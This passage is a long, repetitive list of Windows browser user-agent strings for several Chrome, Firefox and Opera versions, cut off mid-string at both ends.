Chrome/88.0.4324.96 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; rv:91.0) Gecko/20100101 Firefox/91.0 -Mozilla/5.0 (Windows NT 6.1; WOW64; rv:91.0) Gecko/20100101 Firefox/91.0 -Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 -Mozilla/5.0 (Windows NT 6.3; rv:91.0) Gecko/20100101 Firefox/91.0 -Mozilla/5.0 (Windows NT 6.3; WOW64; rv:91.0) Gecko/20100101 Firefox/91.0 -Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 -Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 -Mozilla/5.0 (Windows NT 10.0; WOW64; rv:91.0) Gecko/20100101 Firefox/91.0 -Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 -Mozilla/5.0 (Windows NT 6.1; rv:90.0) Gecko/20100101 Firefox/90.0 -Mozilla/5.0 (Windows NT 6.1; WOW64; rv:90.0) Gecko/20100101 Firefox/90.0 -Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 -Mozilla/5.0 (Windows NT 6.3; rv:90.0) Gecko/20100101 Firefox/90.0 -Mozilla/5.0 (Windows NT 6.3; WOW64; rv:90.0) Gecko/20100101 Firefox/90.0 -Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 -Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 -Mozilla/5.0 (Windows NT 10.0; WOW64; rv:90.0) Gecko/20100101 Firefox/90.0 -Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 -Mozilla/5.0 (Windows NT 6.1; rv:89.0) Gecko/20100101 Firefox/89.0 -Mozilla/5.0 (Windows NT 6.1; WOW64; rv:89.0) Gecko/20100101 Firefox/89.0 -Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 -Mozilla/5.0 (Windows NT 6.3; rv:89.0) Gecko/20100101 Firefox/89.0 -Mozilla/5.0 (Windows NT 6.3; WOW64; rv:89.0) Gecko/20100101 Firefox/89.0 -Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 -Mozilla/5.0 (Windows NT 10.0; rv:89.0) Gecko/20100101 Firefox/89.0 -Mozilla/5.0 (Windows NT 10.0; WOW64; rv:89.0) Gecko/20100101 Firefox/89.0 -Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 -Mozilla/5.0 (Windows NT 6.1; rv:88.0) Gecko/20100101 Firefox/88.0 -Mozilla/5.0 (Windows NT 6.1; WOW64; rv:88.0) Gecko/20100101 Firefox/88.0 -Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 -Mozilla/5.0 (Windows NT 6.3; rv:88.0) Gecko/20100101 Firefox/88.0 -Mozilla/5.0 (Windows NT 6.3; WOW64; rv:88.0) Gecko/20100101 Firefox/88.0 -Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 -Mozilla/5.0 (Windows NT 10.0; rv:88.0) Gecko/20100101 Firefox/88.0 -Mozilla/5.0 (Windows NT 10.0; WOW64; rv:88.0) Gecko/20100101 Firefox/88.0 -Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 -Mozilla/5.0 (Windows NT 6.1; rv:87.0) Gecko/20100101 Firefox/87.0 -Mozilla/5.0 (Windows NT 6.1; WOW64; rv:87.0) Gecko/20100101 Firefox/87.0 -Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 -Mozilla/5.0 (Windows NT 6.3; rv:87.0) Gecko/20100101 Firefox/87.0 -Mozilla/5.0 (Windows NT 6.3; WOW64; rv:87.0) Gecko/20100101 Firefox/87.0 -Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 -Mozilla/5.0 (Windows NT 10.0; rv:87.0) Gecko/20100101 Firefox/87.0 -Mozilla/5.0 (Windows NT 10.0; WOW64; rv:87.0) Gecko/20100101 Firefox/87.0 -Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 -Mozilla/5.0 (Windows NT 6.1; rv:86.0) Gecko/20100101 Firefox/86.0 -Mozilla/5.0 (Windows NT 6.1; WOW64; rv:86.0) Gecko/20100101 Firefox/86.0 -Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 -Mozilla/5.0 (Windows NT 6.3; rv:86.0) Gecko/20100101 Firefox/86.0 -Mozilla/5.0 (Windows NT 6.3; WOW64; rv:86.0) Gecko/20100101 Firefox/86.0 -Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 -Mozilla/5.0 (Windows NT 10.0; rv:86.0) Gecko/20100101 Firefox/86.0 -Mozilla/5.0 (Windows NT 10.0; WOW64; rv:86.0) Gecko/20100101 Firefox/86.0 -Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 -Mozilla/5.0 (Windows NT 6.1; rv:85.0) Gecko/20100101 Firefox/85.0 -Mozilla/5.0 (Windows NT 6.1; WOW64; rv:85.0) Gecko/20100101 Firefox/85.0 -Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 -Mozilla/5.0 (Windows NT 6.3; rv:85.0) Gecko/20100101 Firefox/85.0 -Mozilla/5.0 (Windows NT 6.3; WOW64; rv:85.0) Gecko/20100101 Firefox/85.0 -Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 -Mozilla/5.0 (Windows NT 10.0; rv:85.0) Gecko/20100101 Firefox/85.0 -Mozilla/5.0 (Windows NT 10.0; WOW64; rv:85.0) Gecko/20100101 Firefox/85.0 -Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 -Mozilla/5.0 (Windows NT 6.1; rv:84.0) Gecko/20100101 Firefox/84.0 -Mozilla/5.0 (Windows NT 6.1; WOW64; rv:84.0) Gecko/20100101 Firefox/84.0 -Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 -Mozilla/5.0 (Windows NT 6.3; rv:84.0) Gecko/20100101 Firefox/84.0 -Mozilla/5.0 (Windows NT 6.3; WOW64; rv:84.0) Gecko/20100101 Firefox/84.0 -Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 -Mozilla/5.0 (Windows NT 10.0; rv:84.0) Gecko/20100101 Firefox/84.0 -Mozilla/5.0 (Windows NT 10.0; WOW64; rv:84.0) Gecko/20100101 Firefox/84.0 -Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 -Mozilla/5.0 (Windows NT 6.1; rv:83.0) Gecko/20100101 Firefox/83.0 -Mozilla/5.0 (Windows NT 6.1; WOW64; rv:83.0) Gecko/20100101 Firefox/83.0 -Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 -Mozilla/5.0 (Windows NT 6.3; rv:83.0) Gecko/20100101 Firefox/83.0 -Mozilla/5.0 (Windows NT 6.3; WOW64; rv:83.0) Gecko/20100101 Firefox/83.0 -Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 -Mozilla/5.0 (Windows NT 10.0; rv:83.0) Gecko/20100101 Firefox/83.0 -Mozilla/5.0 (Windows NT 10.0; WOW64; rv:83.0) Gecko/20100101 Firefox/83.0 -Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 OPR/77.0.4054.277 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 OPR/77.0.4054.277 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 OPR/77.0.4054.277 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 OPR/77.0.4054.277 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 OPR/77.0.4054.277 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 OPR/77.0.4054.277 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 OPR/77.0.4054.277 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 OPR/77.0.4054.277 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 OPR/77.0.4054.277 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.254 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.254 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.254 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.254 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.254 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.254 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.254 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.254 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.254 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.203 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.203 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.203 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.203 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.203 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.203 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.203 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.203 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.203 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.172 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.172 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.172 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.172 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.172 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.172 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.172 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.172 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.172 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.146 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.146 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.146 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.146 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.146 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.146 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.146 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.146 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.146 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 OPR/77.0.4054.90 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 OPR/77.0.4054.90 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 OPR/77.0.4054.90 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 OPR/77.0.4054.90 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 OPR/77.0.4054.90 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 OPR/77.0.4054.90 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 OPR/77.0.4054.90 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 OPR/77.0.4054.90 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 OPR/77.0.4054.90 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.80 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.80 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.80 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.80 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.80 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.80 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.80 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.80 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.80 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 OPR/77.0.4054.64 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 OPR/77.0.4054.64 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 OPR/77.0.4054.64 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 OPR/77.0.4054.64 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 OPR/77.0.4054.64 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 OPR/77.0.4054.64 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 OPR/77.0.4054.64 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 OPR/77.0.4054.64 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 OPR/77.0.4054.64 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.60 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.60 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.60 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.60 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.60 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.60 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.60 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.60 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 OPR/77.0.4054.60 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.177 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.177 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.177 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.177 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.177 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.177 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.177 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.177 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.177 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.175 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.175 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.175 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.175 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.175 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.175 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.175 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.175 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 